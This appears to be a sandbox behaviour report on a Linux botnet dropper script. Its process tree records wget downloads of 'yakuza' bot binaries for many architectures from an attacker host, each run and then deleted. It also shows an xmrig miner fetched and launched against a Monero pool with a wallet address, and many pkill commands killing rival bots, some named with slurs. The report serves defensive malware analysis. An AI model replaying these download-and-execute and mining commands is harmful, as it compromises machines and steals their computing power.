File opened for reading /proc/700/cmdline /usr/bin/pkill N/A
File opened for reading /proc/36/status /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/pkill N/A
File opened for reading /proc/700/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/cmdline /usr/bin/pkill N/A
File opened for reading /proc/119/status /usr/bin/pkill N/A
File opened for reading /proc/14/status /usr/bin/pkill N/A
File opened for reading /proc/326/status /usr/bin/pkill N/A
File opened for reading /proc/76/cmdline /usr/bin/pkill N/A
File opened for reading /proc/701/cmdline /usr/bin/pkill N/A
File opened for reading /proc/674/status /usr/bin/pkill N/A
File opened for reading /proc/74/cmdline /usr/bin/pkill N/A
File opened for reading /proc/335/status /usr/bin/pkill N/A
File opened for reading /proc/120/cmdline /usr/bin/pkill N/A
File opened for reading /proc/23/cmdline /usr/bin/pkill N/A
File opened for reading /proc/73/status /usr/bin/pkill N/A
File opened for reading /proc/381/status /usr/bin/pkill N/A
File opened for reading /proc/335/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /usr/bin/pkill N/A
File opened for reading /proc/331/cmdline /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/status /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/241/status /usr/bin/pkill N/A
File opened for reading /proc/78/cmdline /usr/bin/pkill N/A
File opened for reading /proc/84/cmdline /usr/bin/pkill N/A
File opened for reading /proc/16/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/cmdline /usr/bin/pkill N/A
File opened for reading /proc/77/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/381/status /usr/bin/pkill N/A
File opened for reading /proc/11/status /usr/bin/pkill N/A
File opened for reading /proc/331/status /usr/bin/pkill N/A
File opened for reading /proc/671/status /usr/bin/pkill N/A
File opened for reading /proc/741/status /usr/bin/pkill N/A
File opened for reading /proc/1182/status /usr/bin/pkill N/A
File opened for reading /proc/14/status /usr/bin/pkill N/A
File opened for reading /proc/740/status /usr/bin/pkill N/A
File opened for reading /proc/16/status /usr/bin/pkill N/A
File opened for reading /proc/702/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/329/cmdline /usr/bin/pkill N/A
File opened for reading /proc/76/status /usr/bin/pkill N/A
File opened for reading /proc/78/status /usr/bin/pkill N/A
File opened for reading /proc/666/status /usr/bin/pkill N/A
File opened for reading /proc/1082/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/2/cmdline /usr/bin/pkill N/A
File opened for reading /proc/112/status /usr/bin/pkill N/A
File opened for reading /proc/72/cmdline /usr/bin/pkill N/A
File opened for reading /proc/738/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/status /usr/bin/pkill N/A
File opened for reading /proc/381/status /usr/bin/pkill N/A
File opened for reading /proc/18/status /usr/bin/pkill N/A
File opened for reading /proc/947/status /usr/bin/pkill N/A
File opened for reading /proc/119/cmdline /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/696/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/pkill N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yakuza.i686 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.ppc /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm7 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm5 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mipsel /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm6 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.m68k /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm4 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.sparc /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/curl N/A
File opened for modification /tmp/yakuza.sh /usr/bin/wget N/A
File opened for modification /tmp/yakuza.x86 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i586 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mips /usr/bin/wget N/A
File opened for modification /tmp/S�@@p�~@8 /bin/sh N/A

Processes

/tmp/yak.sh

[/tmp/yak.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/bin/sh

[sh -c pkill -9 902i13 || busybox pkill -9 902i13]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/usr/bin/pkill

[pkill -9 902i13]

/bin/busybox

[busybox pkill -9 902i13]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/sh

[sh -c pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7]

/usr/bin/pkill

[pkill -9 HOHO-LUGO7]

/bin/busybox

[busybox pkill -9 HOHO-LUGO7]

/bin/sh

[sh -c pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL]

/usr/bin/pkill

[pkill -9 HOHO-U79OL]

/bin/busybox

[busybox pkill -9 HOHO-U79OL]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/sh

[sh -c pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87]

/usr/bin/pkill

[pkill -9 JuYfouyf87]

/bin/busybox

[busybox pkill -9 JuYfouyf87]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.arm6]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/sh

[sh -c pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE]

/usr/bin/pkill

[pkill -9 LOLKIKEEEDDE]

/bin/busybox

[busybox pkill -9 LOLKIKEEEDDE]

/bin/sh

[sh -c pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e]

/usr/bin/pkill

[pkill -9 ekjheory98e]

/bin/busybox

[busybox pkill -9 ekjheory98e]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/sh

[sh -c pkill -9 scansh4 || busybox pkill -9 scansh4]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/pkill

[pkill -9 scansh4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/busybox

[busybox pkill -9 scansh4]

/bin/sh

[sh -c pkill -9 MDMA || busybox pkill -9 MDMA]

/usr/bin/pkill

[pkill -9 MDMA]

/bin/busybox

[busybox pkill -9 MDMA]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/sh

[sh -c pkill -9 fdevalvex || busybox pkill -9 fdevalvex]

/usr/bin/pkill

[pkill -9 fdevalvex]

/bin/busybox

[busybox pkill -9 fdevalvex]

/bin/sh

[sh -c pkill -9 scanspc || busybox pkill -9 scanspc]

/usr/bin/pkill

[pkill -9 scanspc]

/bin/busybox

[busybox pkill -9 scanspc]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/sh

[sh -c pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ]

/usr/bin/pkill

[pkill -9 MELTEDNINJAREALZ]

/bin/busybox

[busybox pkill -9 MELTEDNINJAREALZ]

/bin/sh

[sh -c pkill -9 flexsonskids || busybox pkill -9 flexsonskids]

/usr/bin/pkill

[pkill -9 flexsonskids]

/bin/chmod

[chmod +x yakuza.arm4]

/bin/busybox

[busybox pkill -9 flexsonskids]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/sh

[sh -c pkill -9 scanx86 || busybox pkill -9 scanx86]

/usr/bin/pkill

[pkill -9 scanx86]

/bin/busybox

[busybox pkill -9 scanx86]

/bin/sh

[sh -c pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL]

/usr/bin/pkill

[pkill -9 MISAKI-U79OL]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/busybox

[busybox pkill -9 MISAKI-U79OL]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/sh

[sh -c pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe]

/usr/bin/pkill

[pkill -9 foAxi102kxe]

/bin/busybox

[busybox pkill -9 foAxi102kxe]

/bin/sh

[sh -c pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj]

/usr/bin/pkill

[pkill -9 swodjwodjwoj]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/busybox

[busybox pkill -9 swodjwodjwoj]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/sh

[sh -c pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l]

/usr/bin/pkill

[pkill -9 MmKiy7f87l]

/bin/busybox

[busybox pkill -9 MmKiy7f87l]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/sh

[sh -c pkill -9 freecookiex86 || busybox pkill -9 freecookiex86]

/usr/bin/pkill

[pkill -9 freecookiex86]

/bin/busybox

[busybox pkill -9 freecookiex86]

/bin/ps

[ps x]

/bin/grep

[grep xmrig]

/bin/grep

[grep -v grep]

/bin/grep

[grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW]

/bin/sh

[sh -c pkill -9 sysgpu || busybox pkill -9 sysgpu]

/usr/bin/pkill

[pkill -9 sysgpu]

/usr/bin/curl

[curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig]

/bin/busybox

[busybox pkill -9 sysgpu]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/sh

[sh -c pkill -9 frgege || busybox pkill -9 frgege]

/usr/bin/pkill

[pkill -9 frgege]

/bin/busybox

[busybox pkill -9 frgege]

/bin/sh

[sh -c pkill -9 sysupdater || busybox pkill -9 sysupdater]

/usr/bin/pkill

[pkill -9 sysupdater]

/bin/busybox

[busybox pkill -9 sysupdater]

/bin/sh

[sh -c pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd]

/usr/bin/pkill

[pkill -9 0DnAzepd]

/bin/busybox

[busybox pkill -9 0DnAzepd]

/bin/sh

[sh -c pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69]

/usr/bin/pkill

[pkill -9 NiGGeRD0nks69]

/bin/busybox

[busybox pkill -9 NiGGeRD0nks69]

/bin/sh

[sh -c pkill -9 frgreu || busybox pkill -9 frgreu]

/usr/bin/pkill

[pkill -9 frgreu]

/bin/busybox

[busybox pkill -9 frgreu]

/bin/sh

[sh -c pkill -9 telnetd || busybox pkill -9 telnetd]

/usr/bin/pkill

[pkill -9 telnetd]

/bin/busybox

[busybox pkill -9 telnetd]

/bin/sh

[sh -c pkill -9 0x766f6964 || busybox pkill -9 0x766f6964]

/usr/bin/pkill

[pkill -9 0x766f6964]

/bin/busybox

[busybox pkill -9 0x766f6964]

/bin/sh

[sh -c pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337]

/usr/bin/pkill

[pkill -9 NiGGeRd0nks1337]

/bin/busybox

[busybox pkill -9 NiGGeRd0nks1337]

/bin/sh

[sh -c pkill -9 gaft || busybox pkill -9 gaft]

/usr/bin/pkill

[pkill -9 gaft]

/bin/busybox

[busybox pkill -9 gaft]

/bin/sh

[sh -c pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa]

/usr/bin/pkill

[pkill -9 urasgbsigboa]

/bin/busybox

[busybox pkill -9 urasgbsigboa]

/bin/sh

[sh -c pkill -9 120i3UI49 || busybox pkill -9 120i3UI49]

/usr/bin/pkill

[pkill -9 120i3UI49]

/bin/busybox

[busybox pkill -9 120i3UI49]

/bin/chmod

[chmod +x xmrig]

/usr/bin/nohup

[nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls --cpu-priority=3 --asm=auto]

/tmp/xmrig

[./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[sh -c pkill -9 OaF3 || busybox pkill -9 OaF3]

/usr/bin/pkill

[pkill -9 OaF3]

/bin/busybox

[busybox pkill -9 OaF3]

/bin/sh

[sh -c pkill -9 geae || busybox pkill -9 geae]

/usr/bin/pkill

[pkill -9 geae]

/bin/busybox

[busybox pkill -9 geae]

/bin/sh

[sh -c pkill -9 vaiolmao || busybox pkill -9 vaiolmao]

/usr/bin/pkill

[pkill -9 vaiolmao]

/bin/busybox

[busybox pkill -9 vaiolmao]

/bin/sh

[sh -c pkill -9 123123a || busybox pkill -9 123123a]

/usr/bin/pkill

[pkill -9 123123a]

/bin/busybox

[busybox pkill -9 123123a]

/bin/sh

[sh -c pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D]

/usr/bin/pkill

[pkill -9 Ofurain0n4H34D]

/bin/busybox

[busybox pkill -9 Ofurain0n4H34D]

/bin/sh

[sh -c pkill -9 ggTrex || busybox pkill -9 ggTrex]

/usr/bin/pkill

[pkill -9 ggTrex]

/bin/busybox

[busybox pkill -9 ggTrex]

/bin/sh

[sh -c pkill -9 wasads || busybox pkill -9 wasads]

/usr/bin/pkill

[pkill -9 wasads]

/bin/busybox

[busybox pkill -9 wasads]

/bin/sh

[sh -c pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD]

/usr/bin/pkill

[pkill -9 1293194hjXD]

/bin/busybox

[busybox pkill -9 1293194hjXD]

/bin/sh

[sh -c pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn]

/usr/bin/pkill

[pkill -9 OthLaLosn]

/bin/busybox

[busybox pkill -9 OthLaLosn]

/bin/sh

[sh -c pkill -9 ggt || busybox pkill -9 ggt]

/usr/bin/pkill

[pkill -9 ggt]

/bin/busybox

[busybox pkill -9 ggt]

/bin/sh

[sh -c pkill -9 wget-log || busybox pkill -9 wget-log]

/usr/bin/pkill

[pkill -9 wget-log]

/bin/busybox

[busybox pkill -9 wget-log]

/bin/sh

[sh -c pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER]

/usr/bin/pkill

[pkill -9 1337SoraLOADER]

/bin/busybox

[busybox pkill -9 1337SoraLOADER]

/bin/sh

[sh -c pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA]

/usr/bin/pkill

[pkill -9 SAIAKINA]

/bin/busybox

[busybox pkill -9 SAIAKINA]

/bin/sh

[sh -c pkill -9 ggtq || busybox pkill -9 ggtq]

/usr/bin/pkill

[pkill -9 ggtq]

/bin/busybox

[busybox pkill -9 ggtq]

/bin/sh

[sh -c pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2]

/usr/bin/pkill

[pkill -9 1378bfp919GRB1Q2]

/bin/busybox

[busybox pkill -9 1378bfp919GRB1Q2]

/bin/sh

[sh -c pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO]

/usr/bin/pkill

[pkill -9 SAIAKUSO]

/bin/busybox

[busybox pkill -9 SAIAKUSO]

/bin/sh

[sh -c pkill -9 ggtr || busybox pkill -9 ggtr]

/usr/bin/pkill

[pkill -9 ggtr]

/bin/busybox

[busybox pkill -9 ggtr]

/bin/sh

[sh -c pkill -9 14Fa || busybox pkill -9 14Fa]

/usr/bin/pkill

[pkill -9 14Fa]

/bin/busybox

[busybox pkill -9 14Fa]

/bin/sh

[sh -c pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337]

/usr/bin/pkill

[pkill -9 SEXSLAVE1337]

/bin/busybox

[busybox pkill -9 SEXSLAVE1337]

/bin/sh

[sh -c pkill -9 ggtt || busybox pkill -9 ggtt]

/usr/bin/pkill

[pkill -9 ggtt]

/bin/busybox

[busybox pkill -9 ggtt]

/bin/sh

[sh -c pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4]

/usr/bin/pkill

[pkill -9 1902a3u912u3u4]

/bin/busybox

[busybox pkill -9 1902a3u912u3u4]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 haetrghbr || busybox pkill -9 haetrghbr]

/usr/bin/pkill

[pkill -9 haetrghbr]

/bin/busybox

[busybox pkill -9 haetrghbr]

/bin/sh

[sh -c pkill -9 19ju3d || busybox pkill -9 19ju3d]

/usr/bin/pkill

[pkill -9 19ju3d]

/bin/busybox

[busybox pkill -9 19ju3d]

/bin/sh

[sh -c pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120]

/usr/bin/pkill

[pkill -9 SORAojkf120]

/bin/busybox

[busybox pkill -9 SORAojkf120]

/bin/sh

[sh -c pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92]

/usr/bin/pkill

[pkill -9 hehahejeje92]

/bin/busybox

[busybox pkill -9 hehahejeje92]

/bin/sh

[sh -c pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91]

/usr/bin/pkill

[pkill -9 2U2JDJA901F91]

/bin/busybox

[busybox pkill -9 2U2JDJA901F91]

/bin/sh

[sh -c pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12]

/usr/bin/pkill

[pkill -9 SlaVLav12]

/bin/busybox

[busybox pkill -9 SlaVLav12]

/bin/sh

[sh -c pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh]

/usr/bin/pkill

[pkill -9 helpmedaddthhhhh]

/bin/busybox

[busybox pkill -9 helpmedaddthhhhh]

/bin/sh

[sh -c pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq]

/usr/bin/pkill

[pkill -9 2wgg9qphbq]

/bin/busybox

[busybox pkill -9 2wgg9qphbq]

/bin/sh

[sh -c pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices]

/usr/bin/pkill

[pkill -9 Slav3Th3seD3vices]

/bin/busybox

[busybox pkill -9 Slav3Th3seD3vices]

/bin/sh

[sh -c pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ]

/usr/bin/pkill

[pkill -9 hzSmYZjYMQ]

/bin/busybox

[busybox pkill -9 hzSmYZjYMQ]

/bin/sh

[sh -c pkill -9 5Gbf || busybox pkill -9 5Gbf]

/usr/bin/pkill

[pkill -9 5Gbf]

/bin/busybox

[busybox pkill -9 5Gbf]

/bin/sh

[sh -c pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL]

/usr/bin/pkill

[pkill -9 SoRAxD123LOL]

/bin/busybox

[busybox pkill -9 SoRAxD123LOL]

/bin/sh

[sh -c pkill -9 iaGv || busybox pkill -9 iaGv]

/usr/bin/pkill

[pkill -9 iaGv]

/bin/busybox

[busybox pkill -9 iaGv]

/bin/sh

[sh -c pkill -9 5aA3 || busybox pkill -9 5aA3]

/usr/bin/pkill

[pkill -9 5aA3]

/bin/busybox

[busybox pkill -9 5aA3]

/bin/sh

[sh -c pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL]

/usr/bin/pkill

[pkill -9 SoRAxD420LOL]

/bin/busybox

[busybox pkill -9 SoRAxD420LOL]

/bin/sh

[sh -c pkill -9 insomni || busybox pkill -9 insomni]

/usr/bin/pkill

[pkill -9 insomni]

/bin/busybox

[busybox pkill -9 insomni]

/bin/sh

[sh -c pkill -9 640277 || busybox pkill -9 640277]

/usr/bin/pkill

[pkill -9 640277]

/bin/busybox

[busybox pkill -9 640277]

/bin/sh

[sh -c pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337]

/usr/bin/pkill

[pkill -9 SoraBeReppin1337]

/bin/busybox

[busybox pkill -9 SoraBeReppin1337]

/bin/sh

[sh -c pkill -9 ipcamCache || busybox pkill -9 ipcamCache]

/usr/bin/pkill

[pkill -9 ipcamCache]

/bin/busybox

[busybox pkill -9 ipcamCache]

/bin/sh

[sh -c pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q]

/usr/bin/pkill

[pkill -9 66tlGg9Q]

/bin/busybox

[busybox pkill -9 66tlGg9Q]

/bin/sh

[sh -c pkill -9 T || busybox pkill -9 T]

/usr/bin/pkill

[pkill -9 T]

/bin/busybox

[busybox pkill -9 T]

/bin/sh

[sh -c pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87]

/usr/bin/pkill

[pkill -9 jUYfouyf87]

/bin/busybox

[busybox pkill -9 jUYfouyf87]

/bin/sh

[sh -c pkill -9 6ke3 || busybox pkill -9 6ke3]

/usr/bin/pkill

[pkill -9 6ke3]

/bin/busybox

[busybox pkill -9 6ke3]

/bin/sh

[sh -c pkill -9 TOKYO3 || busybox pkill -9 TOKYO3]

/usr/bin/pkill

[pkill -9 TOKYO3]

/bin/busybox

[busybox pkill -9 TOKYO3]

/bin/sh

[sh -c pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh]

/usr/bin/pkill

[pkill -9 lyEeaXul2dULCVxh]

/bin/busybox

[busybox pkill -9 lyEeaXul2dULCVxh]

/bin/sh

[sh -c pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z]

/usr/bin/pkill

[pkill -9 93OfjHZ2z]

/bin/busybox

[busybox pkill -9 93OfjHZ2z]

/bin/sh

[sh -c pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r]

/usr/bin/pkill

[pkill -9 TY2gD6MZvKc7KU6r]

/bin/busybox

[busybox pkill -9 TY2gD6MZvKc7KU6r]

/bin/sh

[sh -c pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l]

/usr/bin/pkill

[pkill -9 mMkiy6f87l]

/bin/busybox

[busybox pkill -9 mMkiy6f87l]

/bin/sh

[sh -c pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU]

/usr/bin/pkill

[pkill -9 A023UU4U24UIU]

/bin/busybox

[busybox pkill -9 A023UU4U24UIU]

/bin/sh

[sh -c pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd]

/usr/bin/pkill

[pkill -9 TheWeeknd]

/bin/busybox

[busybox pkill -9 TheWeeknd]

/bin/sh

[sh -c pkill -9 mioribitches || busybox pkill -9 mioribitches]

/usr/bin/pkill

[pkill -9 mioribitches]

/bin/busybox

[busybox pkill -9 mioribitches]

/bin/sh

[sh -c pkill -9 A5p9 || busybox pkill -9 A5p9]

/usr/bin/pkill

[pkill -9 A5p9]

/bin/busybox

[busybox pkill -9 A5p9]

/bin/sh

[sh -c pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds]

/usr/bin/pkill

[pkill -9 TheWeeknds]

/bin/busybox

[busybox pkill -9 TheWeeknds]

/bin/sh

[sh -c pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi]

/usr/bin/pkill

[pkill -9 mnblkjpoi]

/bin/busybox

[busybox pkill -9 mnblkjpoi]

/bin/sh

[sh -c pkill -9 AbAd || busybox pkill -9 AbAd]

/usr/bin/pkill

[pkill -9 AbAd]

/bin/busybox

[busybox pkill -9 AbAd]

/bin/sh

[sh -c pkill -9 Tokyos || busybox pkill -9 Tokyos]

/usr/bin/pkill

[pkill -9 Tokyos]

/bin/busybox

[busybox pkill -9 Tokyos]

/bin/sh

[sh -c pkill -9 neb || busybox pkill -9 neb]

/usr/bin/pkill

[pkill -9 neb]

/bin/busybox

[busybox pkill -9 neb]

/bin/sh

[sh -c pkill -9 Akiru || busybox pkill -9 Akiru]

/usr/bin/pkill

[pkill -9 Akiru]

/bin/busybox

[busybox pkill -9 Akiru]

/bin/sh

[sh -c pkill -9 U8inTz || busybox pkill -9 U8inTz]

/usr/bin/pkill

[pkill -9 U8inTz]

/bin/busybox

[busybox pkill -9 U8inTz]

/bin/sh

[sh -c pkill -9 netstats || busybox pkill -9 netstats]

/usr/bin/pkill

[pkill -9 netstats]

/bin/busybox

[busybox pkill -9 netstats]

/bin/sh

[sh -c pkill -9 Alex || busybox pkill -9 Alex]

/usr/bin/pkill

[pkill -9 Alex]

/bin/busybox

[busybox pkill -9 Alex]

/bin/sh

[sh -c pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T]

/usr/bin/pkill

[pkill -9 W9RCAKM20T]

/bin/busybox

[busybox pkill -9 W9RCAKM20T]

/bin/sh

[sh -c pkill -9 newnetword || busybox pkill -9 newnetword]

/usr/bin/pkill

[pkill -9 newnetword]

/bin/busybox

[busybox pkill -9 newnetword]

/bin/sh

[sh -c pkill -9 Ayo215 || busybox pkill -9 Ayo215]

/usr/bin/pkill

[pkill -9 Ayo215]

/bin/busybox

[busybox pkill -9 Ayo215]

/bin/sh

[sh -c pkill -9 Word || busybox pkill -9 Word]

/usr/bin/pkill

[pkill -9 Word]

/bin/busybox

[busybox pkill -9 Word]

/bin/sh

[sh -c pkill -9 nloads || busybox pkill -9 nloads]

/usr/bin/pkill

[pkill -9 nloads]

/bin/busybox

[busybox pkill -9 nloads]

/bin/sh

[sh -c pkill -9 BAdAsV || busybox pkill -9 BAdAsV]

/usr/bin/pkill

[pkill -9 BAdAsV]

/bin/busybox

[busybox pkill -9 BAdAsV]

/bin/sh

[sh -c pkill -9 Wordmane || busybox pkill -9 Wordmane]

/usr/bin/pkill

[pkill -9 Wordmane]

/bin/busybox

[busybox pkill -9 Wordmane]

/bin/sh

[sh -c pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa]

/usr/bin/pkill

[pkill -9 notyakuzaa]

/bin/busybox

[busybox pkill -9 notyakuzaa]

/bin/sh

[sh -c pkill -9 Belch || busybox pkill -9 Belch]

/usr/bin/pkill

[pkill -9 Belch]

/bin/busybox

[busybox pkill -9 Belch]

/bin/sh

[sh -c pkill -9 Wordnets || busybox pkill -9 Wordnets]

/usr/bin/pkill

[pkill -9 Wordnets]

/bin/busybox

[busybox pkill -9 Wordnets]

/bin/sh

[sh -c pkill -9 obp || busybox pkill -9 obp]

/usr/bin/pkill

[pkill -9 obp]

